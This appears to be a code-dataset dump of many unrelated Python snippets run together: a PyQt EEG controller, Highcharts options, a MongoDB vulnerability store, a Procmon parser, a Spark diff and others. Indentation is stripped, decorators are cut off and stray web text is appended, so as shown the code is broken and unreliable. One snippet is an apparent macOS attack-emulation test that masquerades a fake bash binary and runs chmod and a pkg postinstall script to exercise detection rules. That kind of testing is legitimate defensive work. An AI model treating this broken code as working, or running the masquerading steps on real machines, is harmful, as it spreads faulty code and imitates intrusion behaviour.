s.name = item[0]
s.type = item[1]
s.setMinimum(0)
s.setMaximum(127)
s.setValue(val)
s.setStyleSheet('background-color: rgb(64,64,64);')
s.valueChanged.connect(self.changevalue)
l = QtWidgets.QLabel(s.name)
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
sl = QtWidgets.QVBoxLayout()
sl.addWidget(s)
sl.setAlignment(s, QtCore.Qt.AlignHCenter)
sl.addWidget(l)
sl.setAlignment(l, QtCore.Qt.AlignHCenter)
panel.addLayout(sl)
elif (item[1] in ['push', 'slap', 'toggle1', 'toggle2', 'toggle3', 'toggle4']):
b = QtWidgets.QPushButton(item[0])
b.name = item[0]
b.type = item[1]
b.value = val
if ((item[1] == 'slap') or (item[1] == 'push')):
b.pressed.connect(self.changevalue)
b.released.connect(self.changevalue)
else:
b.pressed.connect(self.changevalue)
b.released.connect(self.changecolor)
self.setcolor(b)
panel.addWidget(b)
def drawmain(self):
leftlayout = QtWidgets.QVBoxLayout()
rightlayout = QtWidgets.QHBoxLayout()
mainlayout = QtWidgets.QHBoxLayout()
mainlayout.addLayout(leftlayout)
mainlayout.addLayout(rightlayout)
self.setLayout(mainlayout)
section = 'slider'
if patch.config.has_section(section):
sectionlayout = QtWidgets.QHBoxLayout()
self.drawpanel(sectionlayout, patch.config.items(section))
leftlayout.addLayout(sectionlayout)
for row in range(0, 16):
section = ('row%d' % (row + 1))
if patch.config.has_section(section):
sectionlayout = QtWidgets.QHBoxLayout()
self.drawpanel(sectionlayout, patch.config.items(section))
leftlayout.addLayout(sectionlayout)
section = 'button'
if patch.config.has_section(section):
sectionlayout = QtWidgets.QVBoxLayout()
self.drawpanel(sectionlayout, patch.config.items(section))
rightlayout.addLayout(sectionlayout)
for column in range(0, 16):
section = ('column%d' % (column + 1))
if patch.config.has_section(section):
sectionlayout = QtWidgets.QVBoxLayout()
self.drawpanel(sectionlayout, patch.config.items(section))
rightlayout.addLayout(sectionlayout)
def changecolor(self):
target = self.sender()
self.setcolor(target)
def changevalue(self):
target = self.sender()
send = True
if ((target.type == 'slider') or (target.type == 'dial')):
val = target.value()
elif (target.type == 'text'):
try:
val = float(target.text())
target.setText(('%g' % val))
except ValueError:
val = target.text()
elif (target.type == 'slap'):
target.value = ((target.value + 1) % 2)
val = ((target.value * 127) / 1)
send = (val > 0)
elif (target.type == 'push'):
target.value = ((target.value + 1) % 2)
val = ((target.value * 127) / 1)
elif (target.type == 'toggle1'):
target.value = ((target.value + 1) % 2)
val = ((target.value * 127) / 1)
elif (target.type == 'toggle2'):
target.value = ((target.value + 1) % 3)
val = ((target.value * 127) / 2)
elif (target.type == 'toggle3'):
target.value = ((target.value + 1) % 4)
val = ((target.value * 127) / 3)
elif (target.type == 'toggle4'):
target.value = ((target.value + 1) % 5)
val = ((target.value * 127) / 4)
self.setcolor(target)
if send:
key = ('%s.%s' % (prefix, target.name))
if (target.type != 'text'):
val = EEGsynth.rescale(val, slope=output_scale, offset=output_offset)
patch.setvalue(key, val)
monitor.update(key, val)
def setcolor(self, target):
grey = 'background-color: rgb(250,250,250); border: 1px solid gray; border-radius: 4px; padding: 4px 4px;'
red = 'background-color: rgb(255,0,0); border: 1px solid gray; border-radius: 4px; padding: 4px 4px;'
yellow = 'background-color: rgb(250,250,60); border: 1px solid gray; border-radius: 4px; padding: 4px 4px;'
green = 'background-color: rgb(60,200,60); border: 1px solid gray; border-radius: 4px; padding: 4px 4px;'
amber = 'background-color: rgb(250,190,45); border: 1px solid gray; border-radius: 4px; padding: 4px 4px;'
if (target.type == 'slap'):
if (target.value == 1):
target.setStyleSheet(amber)
else:
target.setStyleSheet(grey)
elif ((target.type == 'toggle1') or (target.type == 'push')):
if (target.value == 1):
target.setStyleSheet(red)
else:
target.setStyleSheet(grey)
elif (target.type == 'toggle2'):
if (target.value == 1):
target.setStyleSheet(red)
elif (target.value == 2):
target.setStyleSheet(yellow)
else:
target.setStyleSheet(grey)
elif (target.type == 'toggle3'):
if (target.value == 1):
target.setStyleSheet(red)
elif (target.value == 2):
target.setStyleSheet(yellow)
elif (target.value == 3):
target.setStyleSheet(green)
else:
target.setStyleSheet(grey)
elif (target.type == 'toggle4'):
if (target.value == 1):
target.setStyleSheet(red)
elif (target.value == 2):
target.setStyleSheet(yellow)
elif (target.value == 3):
target.setStyleSheet(green)
elif (target.value == 4):
target.setStyleSheet(amber)
else:
target.setStyleSheet(grey)
elif ((target.type == 'slap') or (target.type == 'push')):
target.setStyleSheet(grey) |
class OptionSeriesGaugeSonificationDefaultspeechoptionsActivewhen(Options):
def crossingDown(self):
return self._config_get(None)
def crossingDown(self, num: float):
self._config(num, js_type=False)
def crossingUp(self):
return self._config_get(None)
def crossingUp(self, num: float):
self._config(num, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get(None)
def prop(self, text: str):
self._config(text, js_type=False) |
def run_cmd(app, cmd):
saved_sysout = sys.stdout
sys.stdout = app.stdout
copy_cmd_stdout = StdSim(app.stdout)
copy_stderr = StdSim(sys.stderr)
try:
app.stdout = copy_cmd_stdout
with redirect_stdout(copy_cmd_stdout):
with redirect_stderr(copy_stderr):
app.onecmd_plus_hooks(cmd)
finally:
app.stdout = copy_cmd_stdout.inner_stream
sys.stdout = saved_sysout
out = copy_cmd_stdout.getvalue()
err = copy_stderr.getvalue()
print(out)
print(err)
return (normalize(out), normalize(err)) |
class Database_update():
def __init__(self):
mongo_host = 'localhost'
mongo_port = 27017
maxSevSelDelay = 1
if ('MONGO_PORT_27017_TCP_ADDR' in os.environ):
mongo_host = os.environ['MONGO_PORT_27017_TCP_ADDR']
if ('MONGO_PORT_27017_TCP_PORT' in os.environ):
mongo_port = int(os.environ['MONGO_PORT_27017_TCP_PORT'])
self.client = MongoClient(mongo_host, mongo_port, serverSelectionTimeoutMS=maxSevSelDelay)
self.db = self.client.apiscan
def fetch_records(self):
records = self.db.vulnerabilities.find({})
if records:
for data in records:
data.pop('_id')
print(data)
def insert_record(self, data):
try:
self.db.vulnerabilities.insert(data)
except Exception as e:
raise e
def update_record(self, find, update):
try:
self.db.vulnerabilities.update(find, update)
except Exception as e:
raise e
def update_scan_record(self, find, update):
try:
self.db.scanids.update(find, update)
except Exception as e:
raise e |
def extractTaptrans(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol or frag)) or ('preview' in item['title'].lower())):
return None
if ('Manga' in item['tags']):
return None
if ('Doujinshi' in item['tags']):
return None
return False |
def get_registry_set_info_key_extra_details(metadata, event, extra_detail_io, details_info):
event.category = 'Write Metadata'
event.details['KeySetInformationClass'] = RegistryKeySetInformationClass.get(details_info['key_set_information_class'], '<Unknown: {}>'.format(details_info['key_set_information_class']))
event.details['Length'] = details_info['length']
if (details_info['length'] > 0):
if (event.details['KeySetInformationClass'] == 'KeyWriteTimeInformation'):
event.details['LastWriteTime'] = read_filetime(extra_detail_io)
elif (event.details['KeySetInformationClass'] == 'KeyWow64FlagsInformation'):
event.details['Wow64Flags'] = read_u32(extra_detail_io)
elif (event.details['KeySetInformationClass'] == 'KeyWriteTimeInformation'):
event.details['HandleTags'] = read_u32(extra_detail_io) |
class SlaPolicy(BaseObject):
def __init__(self, api=None, created_at=None, description=None, filter=None, id=None, policy_metrics=None, position=None, title=None, updated_at=None, url=None, **kwargs):
self.api = api
self.created_at = created_at
self.description = description
self.filter = filter
self.id = id
self.policy_metrics = policy_metrics
self.position = position
self.title = title
self.updated_at = updated_at
self.url = url
for (key, value) in kwargs.items():
setattr(self, key, value)
for key in self.to_dict():
if (getattr(self, key) is None):
try:
self._dirty_attributes.remove(key)
except KeyError:
continue
def created(self):
if self.created_at:
return dateutil.parser.parse(self.created_at)
def created(self, created):
if created:
self.created_at = created
def updated(self):
if self.updated_at:
return dateutil.parser.parse(self.updated_at)
def updated(self, updated):
if updated:
self.updated_at = updated |
def d64_to_coord(d64):
(divisor, digits) = (precision, d64)
if d64.startswith('-'):
divisor = (- divisor)
digits = digits[1:]
number = 0
for digit in digits:
value = alphabet.find(digit)
if (value < 0):
raise ValueError('Invalid d64 value: {}'.format(value))
number = ((number * 64) + value)
return (number / divisor) |
def diff(left: DataFrame, right: DataFrame, unique_key_col='id', compare_cols=None, include_unchanged_rows=False) -> DataFrame:
if (not compare_cols):
if (set(left.schema.names) != set(right.schema.names)):
raise ValueError(f'''The two DataFrames to compare do not contain the same columns.
left cols (in alpha order): {sorted(set(left.schema.names))}
right cols (in alpha order): {sorted(set(right.schema.names))}''')
compare_cols = left.schema.names
else:
compare_cols = [c for c in left.schema.names if (c in compare_cols)]
if (unique_key_col in compare_cols):
compare_cols.remove(unique_key_col)
distinct_stmts = ' '.join([f"WHEN l.{c} IS DISTINCT FROM r.{c} THEN 'C'" for c in compare_cols])
compare_expr = f'''
CASE
WHEN l.exists IS NULL THEN 'I'
WHEN r.exists IS NULL THEN 'D'
{distinct_stmts}
ELSE 'N'
END
'''
differences = left.withColumn('exists', lit(1)).alias('l').join(right.withColumn('exists', lit(1)).alias('r'), (left[unique_key_col] == right[unique_key_col]), 'fullouter').withColumn('diff', expr(compare_expr))
cols_to_show = ((['diff'] + [f'l.{unique_key_col}', f'r.{unique_key_col}']) + list(chain(*zip([f'l.{c}' for c in compare_cols], [f'r.{c}' for c in compare_cols]))))
differences = differences.select(*cols_to_show)
if (not include_unchanged_rows):
differences = differences.where("diff != 'N'")
return differences |
.django_db(transaction=True)
def test_missing_def_code():
try:
missing_code_test_data()
except RuntimeError as e:
assert (str(e) == '1 problem(s) have been found with the raw DEF Code file. See log for details.')
else:
assert False, 'Expected a RuntimeError to occur.' |
_os(*metadata.platforms)
def main():
dest_file = '/tmp/test.py'
source_file = '/tmp/test.txt'
masquerade = '/Users/bash'
common.create_macos_masquerade(masquerade)
command = f'chmod +x {source_file}'
common.log('Launching fake bash commands to execute chmod on file via pkg install')
with common.temporary_file('testing', source_file):
common.execute([masquerade, 'childprocess', command, 'childprocess', f'cp {source_file} {dest_file}', 'childprocess', '/tmp/PKInstallSandbox.*/Scripts/*/postinstall'], timeout=10, kill=True)
common.remove_file(masquerade)
common.remove_file(dest_file) |
def test_splitting_by_suite(tmp_path):
git_commit = '4cd693d'
datadir = 'benchmark-results'
repo_root = (tmp_path / 'ideas')
base_filename = NEW_FILENAME.stem
github_target = _utils.GitHubTarget.from_url(IDEAS_GIT_URL)
github_target.ensure_local(str(repo_root))
results_repo = _pyperformance.PyperfResultsRepo.from_remote(IDEAS_GIT_URL, str(repo_root), datadir=datadir)
input_file = (DATA_ROOT / f'{base_filename}.json')
with open(input_file, 'r') as fd:
content = json.load(fd)
assert (len(content['benchmarks']) == 62)
results_file = _pyperformance.PyperfResultsFile(str(input_file)).read()
assert (results_file.suite == _pyperformance.PyperfUploadID.MULTI_SUITE)
results_repo.add(results_file, branch=git_commit, push=False)
with open(((repo_root / datadir) / f'{base_filename}-pyperformance.json'), 'r') as fd:
content = json.load(fd)
assert (len(content['benchmarks']) == 59)
with open(((repo_root / datadir) / f'{base_filename}-pyston.json'), 'r') as fd:
content = json.load(fd)
assert (len(content['benchmarks']) == 3)
assert (['json', 'pycparser', 'thrift'] == sorted([x['metadata']['name'] for x in content['benchmarks']])) |
class _ValueEditor(Editor):
readonly = Bool(False)
root = Instance(RootNode)
scrollable = True
def init(self, parent):
self.update_editor()
editor = TreeEditor(auto_open=self.factory.auto_open, hide_root=True, editable=False, nodes=value_tree_nodes)
self._ui = self.edit_traits(parent=parent, view=View(Item('root', show_label=False, editor=editor), kind='subpanel'))
self._ui.parent = self.ui
self.control = self._ui.control
def update_editor(self):
self.root = RootNode(name='', value=self.value, readonly=self.readonly)
def dispose(self):
self._ui.dispose()
super().dispose()
def get_error_control(self):
return self._ui.get_error_controls() |
class FacetedSearch():
index = None
doc_types = None
fields = None
facets = {}
using = 'default'
def __init__(self, query=None, filters={}, sort=()):
self._query = query
self._filters = {}
self._sort = sort
self.filter_values = {}
for (name, value) in filters.items():
self.add_filter(name, value)
self._s = self.build_search()
def count(self):
return self._s.count()
def __getitem__(self, k):
self._s = self._s[k]
return self
def __iter__(self):
return iter(self._s)
def add_filter(self, name, filter_values):
if (not isinstance(filter_values, (tuple, list))):
if (filter_values is None):
return
filter_values = [filter_values]
self.filter_values[name] = filter_values
f = self.facets[name].add_filter(filter_values)
if (f is None):
return
self._filters[name] = f
def search(self):
s = Search(doc_type=self.doc_types, index=self.index, using=self.using)
return s.response_class(FacetedResponse)
def query(self, search, query):
if query:
if self.fields:
return search.query('multi_match', fields=self.fields, query=query)
else:
return search.query('multi_match', query=query)
return search
def aggregate(self, search):
for (f, facet) in self.facets.items():
agg = facet.get_aggregation()
agg_filter = MatchAll()
for (field, filter) in self._filters.items():
if (f == field):
continue
agg_filter &= filter
search.aggs.bucket(('_filter_' + f), 'filter', filter=agg_filter).bucket(f, agg)
def filter(self, search):
if (not self._filters):
return search
post_filter = MatchAll()
for f in self._filters.values():
post_filter &= f
return search.post_filter(post_filter)
def highlight(self, search):
return search.highlight(*((f if ('^' not in f) else f.split('^', 1)[0]) for f in self.fields))
def sort(self, search):
if self._sort:
search = search.sort(*self._sort)
return search
def build_search(self):
s = self.search()
s = self.query(s, self._query)
s = self.filter(s)
if self.fields:
s = self.highlight(s)
s = self.sort(s)
self.aggregate(s)
return s
def execute(self):
r = self._s.execute()
r._faceted_search = self
return r |
class SQLTask(PythonTask[T]):
_INPUT_REGEX = re.compile('({{\\s*.inputs.(\\w+)\\s*}})', re.IGNORECASE)
def __init__(self, name: str, query_template: str, task_config: Optional[T]=None, task_type='sql_task', inputs: Optional[Dict[(str, Tuple[(Type, Any)])]]=None, metadata: Optional[TaskMetadata]=None, outputs: Optional[Dict[(str, Type)]]=None, **kwargs):
super().__init__(task_type=task_type, name=name, interface=Interface(inputs=(inputs or {}), outputs=(outputs or {})), metadata=metadata, task_config=task_config, **kwargs)
self._query_template = re.sub('\\s+', ' ', query_template.replace('\n', ' ').replace('\t', ' ')).strip()
def query_template(self) -> str:
return self._query_template
def execute(self, **kwargs) -> Any:
raise Exception('Cannot run a SQL Task natively, please mock.')
def get_query(self, **kwargs) -> str:
return self.interpolate_query(self.query_template, **kwargs)
def interpolate_query(cls, query_template, **kwargs) -> Any:
modified_query = query_template
matched = set()
for match in cls._INPUT_REGEX.finditer(query_template):
expr = match.groups()[0]
var = match.groups()[1]
if (var not in kwargs):
raise ValueError(f'Variable {var} in Query (part of {expr}) not found in inputs {kwargs.keys()}')
matched.add(var)
val = kwargs[var]
modified_query = modified_query.replace(expr, str(val))
if (len(matched) < len(kwargs.keys())):
diff = set(kwargs.keys()).difference(matched)
raise ValueError(f'Extra Inputs have no matches in query template - missing {diff}')
return modified_query |
class _IdentityDataflow():
DefinitionLocation = namedtuple('DefinitionLocation', ['block', 'definition'])
def __init__(self):
self._use_map: DefaultDict[(Variable, List[Instruction])] = defaultdict(list)
self._def_map: Dict[(Variable, _IdentityDataflow.DefinitionLocation)] = dict()
def parse_dataflow(self, instruction: Instruction, basic_block: BasicBlock):
for required_variable in instruction.requirements:
self._use_map[required_variable].append(instruction)
for defined_value in instruction.definitions:
self._def_map[defined_value] = self.DefinitionLocation(basic_block, instruction)
def get_usages(self, variable: Variable) -> Iterator[Instruction]:
(yield from self._use_map[variable])
def get_definition(self, variable: Variable) -> Optional[_IdentityDataflow.DefinitionLocation]:
return self._def_map.get(variable, None) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.